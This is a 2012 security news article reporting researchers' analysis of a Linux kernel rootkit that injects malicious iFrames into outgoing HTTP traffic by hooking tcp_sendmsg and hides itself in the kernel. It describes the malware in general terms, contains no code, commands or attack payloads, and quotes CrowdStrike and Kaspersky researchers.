Researchers are analyzing a new rootkit for 64-bit Linux systems that injects iFrames onto websites and redirects traffic to malicious sites that install additional malware. It also accesses the system's memory and leverages the kernel to help conceal itself.
At start-up, the module "creates an initial HTTP injection configuration and installs the inline function hook to hijack TCP connection contents," according to Georg Wicherski, senior security researcher at CrowdStrike. Next, it creates a thread that establishes communication with the command-and-control server for use in updating the injection configuration. It then hides the kernel module itself, using direct kernel object manipulation.
"The iFrame injection mechanism is quite interesting: the malware substitutes the system function tcp_sendmsg -- which is responsible for building TCP packets -- with its own function, so the malicious iFrames are injected into the HTTP traffic by direct modification of the outgoing TCP packets," wrote Marta Janus, security researcher with Kaspersky Labs, in her analysis.
[Related: Information Security In A Post-Stuxnet World]
"In order to obtain the actual injection payload, the malware connects to the C&C server using an encrypted password for authentication," she continued. "We weren't able to connect to the C&C on the port used by malware, but the malicious server is still active and it hosts other *NIX based tools, such as log cleaners."
Once connection to the command-and-control server is established, the server specifies malware to be downloaded over JavaScript or an iFrame.
"The rootkit at hand seems to be the next step in iFrame injecting cybercrime operations, driving traffic to exploit kits," wrote Wicherski of CrowdStrike. "It could also be used in a Waterhole attack to conduct a targeted attack against a specific target audience without leaving much forensic trail."
Wicherski believes this rootkit is not a modification of one that is already publicly available, but he also believes it to be the work of an intermediate-level programmer without extensive kernel experience. He speculates that the attacker is likely to be based in Russia, though he notes that this is based on information that he cannot publicly disclose.
"Although the code quality would be unsatisfying for a serious targeted attack, it is interesting to see the cyber-crime-oriented developers, who have partially shown great skill at developing Windows rootkits, move into the Linux rootkit direction," he said. "The lack of any obfuscation and proper HTTP response parsing, which ultimately also led to discovery of this rootkit, is a further indicator that this is not part of a sophisticated, targeted attack."
PUBLISHED NOV. 20, 2012
